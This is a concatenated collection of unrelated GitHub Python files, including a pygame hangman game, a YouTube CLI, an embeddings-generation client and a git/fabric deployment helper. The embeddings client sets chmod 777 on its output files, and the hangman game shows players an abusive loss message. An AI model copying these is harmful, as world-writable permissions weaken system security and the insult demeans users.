guess=''\r\n letter=\"\"\r\n apple=True\r\n while apple:\r\n for el in pygame.event.get():\r\n if el.type==pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n if el.type==pygame.KEYDOWN:\r\n if el.key==pygame.K_BACKSPACE:\r\n display.fill(color)\r\n display.blit(font.render(\"WON: \"+ str(won) +\" LOSE: \"+str(lose), True, blue), (1100,100))\r\n display.blit(font.render(\"Available letters are ==\"+str(available_letters), True, blue), (50,150))\r\n pygame.display.update()\r\n guess=guess[:-1]\r\n elif el.key==pygame.K_RETURN:\r\n if len(guess)==1:\r\n letter=guess\r\n apple=False\r\n break \r\n else:\r\n display.fill(white)\r\n display.blit(font.render(\"WON: \"+ str(won) +\" LOSE: \"+str(lose), True, blue), (1100,100))\r\n display.blit(font.render(\"Enter a single letter only\", True, red), (50,100))\r\n pygame.display.update()\r\n pygame.time.wait(2*1000)\r\n guess='' \r\n else: \r\n guess += el.unicode\r\n display.blit(font2.render(\"guess a letter------>\"+guess, True,(0,0,0)), (100,400)) \r\n pygame.display.flip()\r\n \r\n if letter not in available_letters:\r\n display.fill(white)\r\n color=white\r\n display.blit(font.render(\"WON: \"+ str(won) +\" LOSE: \"+str(lose), True, blue), (1100,100))\r\n status=\"This letter is already guessed you can't guess it again.Try again with a different letter.\"\r\n display.blit(font.render(status, True, red), (50,200))\r\n display.blit(font.render(\"you gussed word till now as :---> \"+get_guessed_word(secret_word, letters_guessed), True, blue), (50,250))\r\n pygame.display.update()\r\n continue\r\n if letter in secret_word:\r\n letters_guessed.append(letter)\r\n sourav+=secret_word.count(letter)\r\n display.fill(green)\r\n display.blit(font.render(\"WON: \"+ str(won) +\" LOSE: \"+str(lose), True, blue), (1100,100))\r\n color=green\r\n display.blit(font.render(\"Ohh Yeah ! Good Guess:-).Keep it up :---> \"+get_guessed_word(secret_word, letters_guessed), True, blue), (50,250))\r\n if is_word_guessed(secret_word, letters_guessed,sourav) == True:\r\n status2=\" * * Congratulations, you won! * * \"\r\n display.fill(pygame.Color(255,255,0))\r\n display.blit(font.render(\"WON: \"+ str(won) +\" LOSE: \"+str(lose), True, blue), (1100,100))\r\n display.blit(font2.render(status2, True, blue), (50,50))\r\n display.blit(pygame.image.load(\"won.jpg\"),(100,180))\r\n gamefinish=True\r\n display.blit(font2.render(\"Press 'y' to play again else press 'n'\", True, green), (140,130))\r\n display.blit(font.render(\"You are a Champion.The word was :---> \"+get_guessed_word(secret_word, letters_guessed), True, blue), (50,100))\r\n won+=1\r\n pygame.display.update()\r\n pygame.time.wait(1*1000)\r\n newgame=False\r\n banana=True\r\n while banana:\r\n for el in pygame.event.get():\r\n if el.type==pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n if el.type==pygame.KEYDOWN:\r\n if el.key==pygame.K_y:\r\n newgame=True\r\n banana=False\r\n break \r\n elif el.key==pygame.K_n: \r\n pygame.quit() \r\n quit()\r\n else:\r\n display.fill(red)\r\n color=red\r\n display.blit(font.render(\"WON: \"+ str(won) +\" LOSE: \"+str(lose), True, blue), (1100,100))\r\n display.blit(font.render(\"Oops! That letter is not in my word: ---> \"+get_guessed_word(secret_word, letters_guessed), True, blue), (50,250))\r\n letters_guessed.append(letter)\r\n display.blit(pygame.image.load(IMAGES[imagecount]),(500,350))\r\n pygame.display.update()\r\n imagecount+=1\r\n if imagecount>=len(IMAGES):\r\n display.fill(white)\r\n display.blit(font.render(\"WON: \"+ str(won) +\" LOSE: \"+str(lose), True, blue), (1100,100))\r\n display.blit(font2.render(\"The Word i thinking was:---->\"+secret_word, True, red), (180,150))\r\n display.blit(font2.render(\"YOU LOOSE . NOW SHUT YOUR SHITTY MOUTH AND GO AWAY\", True, red), (180,200))\r\n display.blit(pygame.image.load(IMAGES[-1]),(350,300))\r\n gamefinish=True\r\n lose+=1\r\n display.blit(font2.render(\"Press 'y' to play again else press 'n'\", True, green), (180,250))\r\n pygame.display.update()\r\n pygame.time.wait(1*1000)\r\n newgame=False\r\n banana=True\r\n while banana:\r\n for el in pygame.event.get():\r\n if el.type==pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n if el.type==pygame.KEYDOWN:\r\n if el.key==pygame.K_y:\r\n newgame=True \r\n banana=False\r\n break\r\n elif el.key==pygame.K_n: \r\n pygame.quit() \r\n quit()\r\nwhile True: \r\n display.fill(white)\r\n secret_word = choose_word()\r\n hangman(secret_word)\r\n for event in pygame.event.get(): \r\n if event.type == pygame.QUIT: \r\n pygame.quit() \r\n quit() \r\n pygame.display.update() ","repo_name":"Vishnu-yes-i-am/hang_man_with_pygame","sub_path":"hangman_game.py","file_name":"hangman_game.py","file_ext":"py","file_size_in_byte":9593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12903357698","text":"#!/usr/bin/env python\nfrom pyyoutube import Api\nimport os\nimport click\n\n\nAPI = Api(api_key=os.environ[\"API_KEY\"])\nCHANNEL = os.environ[\"YT_CHANNEL\"]\n\n\ndef get_channel_info(channel_id, api=API):\n \"\"\"Get channel info\"\"\"\n channel_info = api.get_channel_info(channel_id=channel_id)\n return channel_info.items[0]\n\n\ndef get_channel_playlist(channel_id, api=API):\n \"\"\"Get channel's playlist\"\"\"\n playlists_by_channel = api.get_playlists(channel_id=channel_id, count=None)\n return playlists_by_channel.items\n\n\ndef get_playlist_name(playlist_id, api=API):\n \"\"\"Get playlist name\"\"\"\n playlist_info = api.get_playlist_info(playlist_id=playlist_id)\n return playlist_info.items[0].snippet.title\n\n\n@click.group()\ndef cli():\n pass\n\n\n@cli.command(\"channel\")\n@click.option(\"--channel-id\", default=CHANNEL, help=\"Channel ID\")\ndef cli_channel_info(channel_id):\n \"\"\"Get channel info\n Example: yt channel --channel-id \n \"\"\"\n\n channel = get_channel_info(channel_id)\n print(channel)\n\n\n@cli.command(\"playlists\")\n@click.option(\"--channel-id\", default=CHANNEL, help=\"Channel ID\")\ndef list_playlists(channel_id):\n \"\"\"List all playlists from a channel\n Example: yt playlists --channel-id \n \"\"\"\n\n playlists = get_channel_playlist(channel_id)\n for playlist in playlists:\n print(playlist.id, playlist.snippet.title)\n\n\nif __name__ == \"__main__\":\n cli()\n","repo_name":"nogibjj/assimilate-aws","sub_path":"yt.py","file_name":"yt.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"31"} +{"seq_id":"13293421072","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Sep 22 13:55:59 2021\r\n\r\n@author: Dell\r\n\"\"\"\r\n#Merge multiple .dat files to one\r\n\r\n# Creating a list of filenames\r\nfilenames = ['1.dat', '2.dat','3.dat']\r\n \r\n# Open file3 in write mode\r\nwith open('123.dat', 'wb') as outfile:\r\n \r\n # Iterate through list\r\n for names in filenames:\r\n \r\n # Open each file in read mode\r\n with open(names,'rb') as infile:\r\n \r\n # read the data from file1 and\r\n # file2 and write it in file3\r\n outfile.write(infile.read())","repo_name":"vaisakhm99/Random-Number-Generator","sub_path":"merge_dat.py","file_name":"merge_dat.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22058538755","text":"#!/usr/bin/env python3\n\n\"\"\"\nBRAND RECOGNITION EMBEDDINGS GENERATION CLIENT\n==============================================\n\nThe following program is used to update embeddings files and frames\n\"\"\"\n\n# %%\n# Importing Libraries\nfrom inference_client import *\nimport os\nimport argparse\nimport json\nimport pickle\nimport tqdm\nimport cv2 as ocv\n\n# %%\n# Main Embeddings Extraction Class\nclass Embeddings:\n def __init__(self, addr, server_ip, emb_label, embed, sv_embed):\n \"\"\"\n This method is used to initialize Brand Recognition embedding generation client\n\n Method Input\n =============\n addr : Local address to data\n server_ip : Server IP at which GRPC server is running\n Format : \"IP:Port\"\n Example : '0.0.0.0:1235'\n emb_label : Label for the current generated embeddings\n embed : Absolute address of the embeddings file\n sv_embed : Absolute address of directory to save embedding in binary & JSON\n\n Method Output\n ==============\n None\n \"\"\"\n self.vid_addr = addr\n self.embedding_label = emb_label\n self.embedding_data_address = embed\n self.embedding_save_directory = sv_embed\n self.scbr_server_ip = server_ip\n self.scbr_inference = br_client(self.scbr_server_ip)\n self.__vid_obj__ = ocv.VideoCapture(self.vid_addr)\n self.FPS = int(self.__vid_obj__.get(ocv.CAP_PROP_FPS))\n self.height = int(self.__vid_obj__.get(ocv.CAP_PROP_FRAME_HEIGHT))\n self.width = int(self.__vid_obj__.get(ocv.CAP_PROP_FRAME_WIDTH))\n self.__total_frames__ = int(self.__vid_obj__.get(ocv.CAP_PROP_FRAME_COUNT))\n self.__new_embeddings__ = dict()\n try:\n with open(self.embedding_data_address, 'rb') as efile1:\n self.embeddings = pickle.load(efile1)\n self.__embeddings_available__ = True\n self.__new_embeddings__['embeds'] = np.array(self.embeddings['embeds'])\n self.__new_embeddings__['tags'] = self.embeddings['tags']\n self.__new_embeddings__['addrs'] = self.embeddings['addrs']\n self.__brand_list__ = list(set(self.__new_embeddings__['tags']))\n except:\n self.__embeddings_available__ = False\n self.__brand_list__ = list()\n if not os.path.exists(f'{self.embedding_save_directory}/Frames'):\n os.mkdir(f'{self.embedding_save_directory}/Frames')\n \n def __str__(self):\n \"\"\"\n This method is __str__ implementation of subject class\n\n Method Input\n =============\n None\n \n Method Output\n ==============\n New Line\n \"\"\"\n print(\"\"\"\n ==================================================\n | Brand Recognition Embeddings Generation Client |\n ==================================================\n \"\"\")\n print(f'Current Embedding Label: {self.embedding_label}')\n print(f'Brand Recognition Server IP Address: {self.scbr_server_ip}')\n print(f'Client ID: {self.scbr_inference.client_name}')\n print(f'Video FPS: {self.FPS}')\n print(f'Video Height: {self.height}')\n print(f'Video Width: {self.width}')\n print(f'Total Video Frames: {self.__total_frames__}')\n print(f'Number of Brand Recognition Labels: {len(self.__brand_list__)}')\n print(f'Brand Recognition Labels: {self.__brand_list__}')\n print(f'Embeddings Extraction Address: {self.embedding_save_directory}')\n print('\\n---------------------------------------------')\n return '\\n'\n \n def __embedding_handler__(self, data, labels, new_addrs):\n \"\"\"\n This method is used to save & handle embeddings\n\n Method Input\n =============\n data : New generated embeddings data\n labels : New labels for the respective generated embeddings\n new_addrs : New embeddings frames addresses\n\n Method Output\n ==============\n None\n \"\"\"\n print('>>>>> Processing Embeddings')\n if self.__embeddings_available__ == True:\n self.__new_embeddings__['embeds'] = np.append(self.__new_embeddings__['embeds'], np.array(data), axis = 0)\n self.__new_embeddings__['tags'].extend(labels)\n self.__new_embeddings__['addrs'].extend(new_addrs)\n else:\n self.__new_embeddings__['embeds'] = np.array(data)\n self.__new_embeddings__['tags'] = labels\n self.__new_embeddings__['addrs'] = new_addrs\n print('>>>>> Saving Embeddings as Binary')\n with open(f'{self.embedding_save_directory}/Embeddings', 'wb') as file1:\n pickle.dump(self.__new_embeddings__, file1)\n print('>>>>> Saving Embeddings as JSON')\n with open(f'{self.embedding_save_directory}/Embeddings.json', 'w') as file1:\n self.__new_embeddings__['embeds'] = self.__new_embeddings__['embeds'].tolist()\n json.dump(self.__new_embeddings__, file1)\n \n def __call__(self, skip = 0):\n \"\"\"\n This method is used to generate embeddings from subject video file\n\n Method Input\n =============\n skip : Number of frames to skip in local video inference ( default : 0 )\n\n Method Output\n ==============\n None\n \"\"\"\n new_emb_labels, new_embs, new_addrs = list(), list(), list()\n count, skip_count, ret = 0, skip, True\n with tqdm.tqdm(total = self.__total_frames__, bar_format = '{l_bar}{bar:10}{r_bar}{bar:-10b}', position = 0, leave = True) as bar:\n while ret:\n ret, cv_dat = self.__vid_obj__.read()\n if not ret:\n break\n if skip_count < skip:\n skip_count += 1\n else:\n skip_count = 0\n pil_dat = Image.fromarray(ocv.cvtColor(cv_dat, ocv.COLOR_BGR2RGB))\n res = self.scbr_inference([pil_dat])\n new_emb_labels.append(self.embedding_label)\n new_embs.append(res[2][0])\n ocv.imwrite(f'{self.embedding_save_directory}/Frames/{self.embedding_label}_' + str(count).zfill(10) + '.jpg', cv_dat)\n new_addrs.append(f'{self.embedding_label}_' + str(count).zfill(10) + '.jpg')\n count += 1\n bar.set_description(f'Label: {self.embedding_label} | Skipping {skip} Frames | Progress') \n bar.update(1)\n self.__embedding_handler__(new_embs, new_emb_labels, new_addrs)\n os.system(f'chmod 777 /{self.embedding_save_directory}/*')\n os.system(f'chmod 777 /{self.embedding_save_directory}/Frames/*')\n\n# %%\n# Embeddings Generation Execution\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description = 'Brand Recognition Embedding Generation Client.')\n parser.add_argument('-ip', '--server_ip', type = str, help = 'IP Address to GRPC Server => IP:Port', required = True)\n parser.add_argument('-lab', '--label', type = str, help = 'Label Against Subject Video for Embeddings Generation', required = True)\n parser.add_argument('-sk', '--skip', type = int, help = 'Number of Frames to Skip in Embeddings Generation', default = 0)\n parser.add_argument('-l', '--link', type = str, help = 'Local Video Address', default = '/video.mp4' )\n parser.add_argument('-embl', '--embedding_addr', type = str, help = 'Current Available Embeddings File', default = '/Embeddings' )\n parser.add_argument('-embs', '--embedding_save', type = str, help = 'Directory to Save Embeddings Files', default = '/Output' )\n args = vars(parser.parse_args())\n emb = Embeddings(addr = args['link'], server_ip = args['server_ip'], emb_label = args['label'], embed = args['embedding_addr'], sv_embed = args['embedding_save'])\n print(emb)\n emb(skip = args['skip'])\n ","repo_name":"codeadeel/Brand-Recognition","sub_path":"Clients/embeddings_client.py","file_name":"embeddings_client.py","file_ext":"py","file_size_in_byte":7924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"782564628","text":"import sys\r\ninput = sys.stdin.readline\r\nsys.setrecursionlimit(10**6)\r\n\r\nn = int(input())\r\ninorder = list(map(int, input().split()))\r\npost = list(map(int, input().split()))\r\nindex = [0] * (n+1)\r\n\r\ndef order(pstart, istart, size):\r\n if size == 0:\r\n return\r\n\r\n pend = pstart + size - 1\r\n node = post[pend]\r\n print(node, end=' ')\r\n \r\n i = index[node]\r\n s = i - istart\r\n order(pstart, istart, s)\r\n pstart += s\r\n istart += s + 1\r\n s = size - s - 1\r\n order(pstart, istart , s)\r\n\r\nfor i in range(n):\r\n index[inorder[i]] = i\r\n\r\norder(0,0, n)","repo_name":"ppocchi/Algorithm","sub_path":"백준/Gold/2263. 트리의 순회/트리의 순회.py","file_name":"트리의 순회.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73696399129","text":"# importing the modules needed to run the program\n\nfrom services import process_images_with_conf\nfrom setup import load_conf, communicate_with_arduino, display_on_pc\nfrom vc.detector import Group\n\nif __name__ == '__main__':\n # Loading configurations from config file\n conf = load_conf(file_path='conf.json')\n # Getting settings in configurations\n settings = conf['settings']\n # Processing images (Vehicle detection and rendering is included)\n print(conf['settings'])\n for i, (name, folder_conf) in enumerate(conf[\"FOLDER_DETAILS\"].items()):\n group = Group(name)\n if folder_conf[\"run\"]:\n (img, _images), wn, __conf = process_images_with_conf(grp=group, conf=folder_conf, i=i)\n # Checking if arduino communication is enabled(all values and conf are in the conf file)\n c_thread = None\n if settings['controller'] is True and __conf[\"send\"]:\n c_thread = communicate_with_arduino(conf=conf, data=group.serialise(), ims=_images, wn=wn)\n # Checking if display is enabled\n if settings[\"monitor\"] is True and __conf[\"show\"] is True:\n display_on_pc(window_name=wn, image=img)\n # while c_thread and c_thread.is_alive():\n # pass\n # else:\n # break\n # Finally, exiting program\n exit(0)\n","repo_name":"DeCraftsman64/vehicle_detector_python_arduino","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"44160073550","text":"with open(\"cluster.txt\") as f:\n data = f.readlines()\n\nwith open('test.csv') as f:\n ques = f.readlines()\n\ndata = data[1:]\nop = {}\nfor i in data:\n line = i.split(' ')\n if line[1] not in op:\n op[line[1]] = []\n op[line[1]].append(ques[int(line[2])-1])\n\nfor key, value in op.items():\n val = list(set(value))\n op[key] = val\n\nwith open('output.csv', 'w') as f:\n for key, value in op.items():\n for i in value:\n f.write(i)\n f.write(\"\\n\")","repo_name":"usercontext/TaskRecommend","sub_path":"cluster_number_to_output.py","file_name":"cluster_number_to_output.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"13975478641","text":"from __future__ import absolute_import\nimport warnings\nimport fabric.api as fab\nimport datetime\nimport os\nfrom time import time, altzone\nfrom .base import BaseCommandUtil\nfrom .utils import legacy_wrap\nimport git\n\n\ndef _git_raw_write_object(repo, obj):\n from stat import S_ISLNK\n from gitdb import IStream\n try:\n from cStringIO import StringIO\n except ImportError:\n from StringIO import StringIO\n\n if obj.__class__.type == git.Blob.type:\n absfilepath = os.path.join(repo.working_tree_dir, obj.path)\n st = os.lstat(absfilepath)\n streamlen = st.st_size\n if S_ISLNK(st.st_mode):\n stream = StringIO(os.readlink(absfilepath))\n else:\n stream = open(absfilepath, 'rb')\n else:\n stream = StringIO()\n obj._serialize(stream)\n streamlen = stream.tell()\n stream.seek(0)\n istream = repo.odb.store(IStream(obj.__class__.type, streamlen, stream))\n obj.binsha = istream.binsha\n return obj\n\n\ndef _create_blob_from_file(repo, filepath):\n from git.index.fun import stat_mode_to_index_mode\n from git.util import to_native_path_linux\n\n absfilepath = os.path.join(repo.working_tree_dir, filepath)\n st = os.lstat(absfilepath)\n blob = git.Blob(repo=repo,\n binsha=git.Blob.NULL_BIN_SHA,\n mode=stat_mode_to_index_mode(st.st_mode),\n path=to_native_path_linux(filepath))\n blob = _git_raw_write_object(repo, blob)\n return blob\n\n\nclass GitFilter(object):\n def __init__(self, repo, index, base_commit):\n self.repo = repo\n self.index = index\n self.base_commit = base_commit\n\n def filter(self):\n raise NotImplementedError('You should create your own apply() method in your own subclass')\n\n def execute(self):\n from git.index.util import TemporaryFileSwap\n\n # Move current index out of the way, as we need to work on the default index file\n index_handler = TemporaryFileSwap(self.index._index_path())\n try:\n self.index.write(self.index._index_path())\n self.filter()\n finally:\n del(index_handler) # release as soon as possible\n return self.index\n\n def add(self, *paths):\n self.index.add(paths)\n\n def remove(self, *paths):\n self.index.remove(\n paths,\n working_tree=False, # just to be sure\n r=True,\n )\n\n @property\n def original_tree(self):\n return self.base_commit.tree\n\n @property\n def filtered_tree(self):\n # Will store tree state to disk, be sure when to call this!\n return self.index.write_tree()\n\n @filtered_tree.setter\n def filtered_tree(self, new_tree):\n warnings.warn(\"Setting the tree directly may cause unexpected results.\")\n # Note: GitFilter moves the index to the default index location for all\n # available methods (like remove) to work as expected. If you change\n # the tree we will switch over to a temporary index. So these methods\n # will then fail to work. THIS IS THE EXPECTED RESULT.\n assert new_tree.binsha\n self.index = git.IndexFile.from_tree(self.repo, new_tree)\n\n def _copy_tree(self, original, additions=None, excludes=None):\n warnings.warn(\"You don't need to copy trees any more, as fabdeploit switched to using git.IndexFile. Will just return original tree.\", PendingDeprecationWarning)\n if additions or excludes:\n raise RuntimeError('Not possible any more, see warning. Use GitFilter.add/remove instead.')\n return original\n\n\nclass Git(BaseCommandUtil):\n local_repository_path = None\n remote_repository_path = None\n release_author = None\n release_branch = None\n release_commit_filter_class = None\n\n def __init__(self, **kwargs):\n super(Git, self).__init__(**kwargs)\n self.base_commit = None\n self.release_commit = None\n if self.local_repository_path is None:\n raise RuntimeError('No local_repository_path specified (class or constructor)')\n if self.remote_repository_path is None:\n raise RuntimeError('No remote_repository_path specified (class or constructor)')\n if self.release_branch is None:\n raise RuntimeError('No release_branch specified (class or constructor)')\n self.local_repository_path = os.path.realpath(os.path.abspath(self.local_repository_path))\n\n def _get_local_repo(self):\n try:\n return self._local_repo\n except AttributeError:\n self._local_repo = git.Repo(self.local_repository_path)\n return self._local_repo\n\n def _raw_copy_commit(self, commit, message=None, parents=None, actor=None):\n warnings.warn(\"Will probable be removed with Git.merge_release_back().\", PendingDeprecationWarning)\n # create a new commit reusing the tree (meaning no file changes)\n new_commit = git.Commit(self._get_local_repo(), git.Commit.NULL_BIN_SHA)\n new_commit.tree = commit.tree\n\n # set commit date\n unix_time = int(time())\n offset = altzone\n new_commit.authored_date = unix_time\n new_commit.author_tz_offset = offset\n # make sure we have a somewhat more linear history\n # (gitg and possibly others will get confused otherwise)\n if new_commit.authored_date == commit.authored_date:\n new_commit.authored_date = new_commit.authored_date + 1\n new_commit.committed_date = unix_time\n new_commit.committer_tz_offset = offset\n if new_commit.committed_date == commit.committed_date:\n new_commit.committed_date = new_commit.committed_date + 1\n\n # set author / comitter\n actor = self._get_release_actor(actor)\n new_commit.author = actor\n new_commit.committer = actor\n\n # set commit message\n if message:\n new_commit.message = message\n else:\n new_commit.message = commit.message\n\n # set parents\n new_commit.parents = parents if not parents is None else []\n\n # reuse encoding\n new_commit.encoding = commit.encoding\n return new_commit\n\n def _raw_write_object(self, obj):\n return _git_raw_write_object(self._get_local_repo(), obj)\n\n def _raw_update_branch(self, branch_name, commit):\n repo = self._get_local_repo()\n if not branch_name in repo.heads:\n repo.create_head(branch_name)\n repo.heads[branch_name].commit = commit\n\n def release_deployment_branch(self):\n return 'release/{release_branch}'.format(release_branch=self.release_branch)\n\n def release_deployment_remote_name(self):\n return self.release_deployment_branch()\n\n def pull_origin(self):\n # init repo and config\n repo = self._get_local_repo()\n release_deployment_branch = self.release_deployment_branch()\n\n # update local branches\n if not 'origin' in [_i.name for _i in repo.remotes]:\n raise RuntimeError('No origin exists in remotes')\n\n with fab.lcd(self.local_repository_path):\n fab.local('git fetch origin') # Make sure we fetch all changes\n fab.local('git checkout \"{branch}\"'.format(branch=self.release_branch))\n fab.local('git pull origin \"{branch}\"'.format(branch=self.release_branch))\n if ('origin' in [_i.name for _i in repo.remotes] and\n release_deployment_branch in repo.remotes.origin.refs):\n # We just update our local release branch to the remote version, no questions asked\n self._raw_update_branch(release_deployment_branch, repo.remotes.origin.refs[release_deployment_branch])\n\n def pull(self):\n if 'origin' in [_i.name for _i in self._get_local_repo().remotes]:\n self.pull_origin()\n\n def _get_release_actor(self, actor=None):\n if actor is None:\n actor = self.release_author\n if actor:\n if isinstance(actor, basestring):\n actor = git.Actor._from_string(actor)\n else:\n cr = self._get_local_repo().config_reader()\n actor = git.Actor.author(cr)\n return actor\n\n def create_release_commit(self, message=None):\n \"\"\" Creates a new release commit \"\"\"\n\n # init repo, latest commit and config\n repo = self._get_local_repo()\n commit = repo.heads[self.release_branch].commit\n self.base_commit = commit # may be used later again\n release_deployment_branch = self.release_deployment_branch()\n\n # last release commit\n parent = None\n if release_deployment_branch in repo.heads:\n parent = repo.heads[release_deployment_branch].commit\n parents = [parent] if parent else []\n\n # create new commit\n if message is None:\n message = (\n \"Deploying '{commit}' from branch '{release_branch}' \"\n \"into '{deployment_branch}'. Date: {timestamp}\".format(\n commit=commit,\n release_branch=self.release_branch,\n deployment_branch=release_deployment_branch,\n timestamp=datetime.datetime.now().isoformat()))\n\n self.release_commit_index = git.IndexFile.from_tree(repo, self.base_commit.tree)\n self.filter_release_commit()\n\n # write commit\n self.release_commit = self.release_commit_index.commit(\n message=message,\n parent_commits=parents,\n head=False,\n author=self._get_release_actor(),\n committer=self._get_release_actor())\n # update release branch\n self._raw_update_branch(release_deployment_branch, self.release_commit)\n\n return self.release_commit\n\n def filter_release_commit(self):\n # You may write a filter to change the commit after if is initially\n # created. Changes may involve changing the tree (remove, change or\n # add files) or changing the meta data (author, date, message).\n # I think this only should be used for tree filters, as other data may be\n # set before even creating the commit.\n if self.release_commit_filter_class is not None:\n self.release_commit_index = self.release_commit_filter_class(\n self._get_local_repo(),\n self.release_commit_index,\n self.base_commit,\n ).execute()\n\n def tag_release(self, tag_name):\n if self.release_commit is None:\n raise RuntimeError('You should create a release commit first')\n self._get_local_repo().create_tag(tag_name, ref=self.release_commit.hexsha1)\n\n def merge_release_back(self):\n # We reuse the original commit here, as the release commit may be\n # changed by some filter.\n warnings.warn(\"Merging back will be removed some day. Please don't depend on it.\", PendingDeprecationWarning)\n if self.base_commit is None or self.release_commit is None:\n raise RuntimeError('You should create a release commit first')\n merge_commit = self._raw_copy_commit(self.base_commit, parents=[self.base_commit, self.release_commit])\n self._raw_write_object(merge_commit)\n assert merge_commit.binsha\n self._raw_update_branch(self.release_branch, merge_commit)\n #merge_index = Index.from_tree(repo, parent, 'HEAD', 'some_branch')\n\n def release(self, message=None, tag_name=None, merge_back=False):\n self.create_release_commit(message=message)\n if tag_name:\n self.tag_release(tag_name)\n if merge_back:\n self.merge_release_back()\n return self.release_commit\n\n def remote_deployment_repository_url(self):\n if self.remote_repository_path[0] == '/':\n return 'ssh://%s@%s:%s%s' % (fab.env.user, fab.env.host, fab.env.port, self.remote_repository_path)\n else:\n return 'ssh://%s@%s:%s/~%s/%s' % (fab.env.user, fab.env.host, fab.env.port, fab.env.user, self.remote_repository_path)\n\n def push_release(self, bare=False):\n \"\"\" Pushes the release branch \"\"\"\n # thanks to https://github.com/dbravender/gitric/blob/master/gitric/api.py\n\n # init repo and config\n repo = self._get_local_repo()\n release_deployment_branch = self.release_deployment_branch()\n release_remote_name = self.release_deployment_remote_name()\n release_remote_url = self.remote_deployment_repository_url()\n\n # initialize remote\n if not release_remote_name in [_i.name for _i in repo.remotes]:\n remote = repo.create_remote(release_remote_name, release_remote_url)\n else:\n remote = repo.remotes[release_remote_name]\n if remote.url != release_remote_url:\n repo.delete_remote(release_remote_name)\n remote = repo.create_remote(release_remote_name, release_remote_url)\n\n # initialize the remote repository (idempotent)\n if bare:\n fab.run('git init --bare \"%s\"' % self.remote_repository_path)\n else:\n fab.run('git init \"%s\"' % self.remote_repository_path)\n # silence git complaints about pushes coming in on the current branch\n # the pushes only seed the immutable object store and do not modify the\n # working copy\n fab.run('GIT_DIR=\"%s/.git\" git config receive.denyCurrentBranch ignore' %\n self.remote_repository_path)\n\n # push to remote\n with fab.lcd(self.local_repository_path):\n fab.local('git push \"{remote}\" \"{branch}\"'.format(\n remote=release_remote_name,\n branch=release_deployment_branch,\n ))\n #remote.push(release_deployment_branch)\n\n def webserver_harden_remote_git(self):\n dotgit_path = self._path_join(self.remote_repository_path, '.git')\n # This does not work with bare repositories. This is by design as\n # bare repositories usually don't get pushed to web server document\n # root's\n if not self._exists(dotgit_path):\n raise IOError('No .git path on server found (%s)' % dotgit_path)\n self._webserver_harden_remote_git_permissions(dotgit_path)\n self._webserver_harden_remote_git_htaccess(dotgit_path)\n\n def _webserver_harden_remote_git_permissions(self, dotgit_path):\n self._run('chmod 700 \"%s\"' % dotgit_path)\n\n def _webserver_harden_remote_git_htaccess(self, dotgit_path):\n htaccess_path = self._path_join(dotgit_path, '.htaccess')\n self._run('echo \"\" > \"%s\"' % htaccess_path)\n self._run('echo \" Satisfy all\" >> \"%s\"' % htaccess_path)\n self._run('echo \" Order deny,allow\" >> \"%s\"' % htaccess_path)\n self._run('echo \" Deny from all\" >> \"%s\"' % htaccess_path)\n self._run('echo \"\" >> \"%s\"' % htaccess_path)\n self._run('echo \"= 2.4>\" >> \"%s\"' % htaccess_path)\n self._run('echo \" Require all denied\" >> \"%s\"' % htaccess_path)\n self._run('echo \"\" >> \"%s\"' % htaccess_path)\n\n def push_origin(self):\n # init repo and config\n repo = self._get_local_repo()\n\n # push changes\n if not 'origin' in [_i.name for _i in repo.remotes]:\n return\n with fab.lcd(self.local_repository_path):\n fab.local('git push origin \"{branch}\"'.format(branch=self.release_branch))\n fab.local('git push origin \"{branch}\"'.format(branch=self.release_deployment_branch()))\n\n def push(self):\n if 'origin' in [_i.name for _i in self._get_local_repo().remotes]:\n self.push_origin()\n self.push_release()\n\n def switch_release(self, commit=None, update_to_remote=None):\n # init repo and latest commit\n release_deployment_branch = self.release_deployment_branch()\n\n # use release commit we created just now if possible\n if commit is None and self.release_commit is not None:\n commit = self.release_commit\n\n # Support passing raw git commit objects\n if isinstance(commit, git.Commit):\n commit = commit.hexsha\n\n # checkout changes on remote\n with fab.cd(self.remote_repository_path):\n # we switch to the appropriate commit using a normal checkout, this\n # way git \"knowns\" where we are going. Afterwards we reset the working\n # to this version, cleaning possible changes.\n # if we would just reset the working copy (like gitric does) we would\n # get a funny state in git. git then resets the branch-pointer to this\n # revision, meaning git would think we have fallen back behind the\n # origin some revisions. If we switch branch when doing the reset we\n # get a diverged warning, because git still thinks our commit belongs\n # to the original branch.\n # so we use checkout (detached head) as this covers the actual stage\n # much better. git now knows we want to fall back to an old revision\n # and thus does not mix up branch information.\n # anyways we do an reset before checkout so the working directory is\n # clean.\n with fab.settings(warn_only=True):\n # may fail on initial push\n fab.run('git reset --hard')\n if update_to_remote:\n # THIS IS NOT HOW FABDEPLOIT IS INTENDED TO BE USED\n # If we have pulled the changes (which gitdeploit does not do by\n # default) and switch back to the branch (not a particular release\n # commit) we may have a edge case. The branch may have fallen\n # behind the remote branch while we stayed at headless commit\n # checkouts. This means switching directly to the branch would\n # revert a lot of changes, pulling them back in afterwards and\n # by this doing a lot of IO while risking some funny state (and\n # perhaps even conflicts?).\n # So if users want to pull changes and switch back to the branch\n # after some time we need to first reset the (local) branch to the\n # current remote version.\n # If you pass update_to_remote (meaning update_to_remote=\"origin\")\n # switch_release() will do that for you by first comparing the\n # sha1 of the branch to the current HEAD. If both differ we are\n # most probably in headless mode and should update the (local)\n # branch. This is done by calling an update-ref to the remote\n # branch. Afterwards the normal checkout.\n # IF YOU USE THIS YOU HAVE TO FETCH FIRST (SOMEWHERE ELSE)\n # ANYWAYS AGAIN, THIS IS NOT 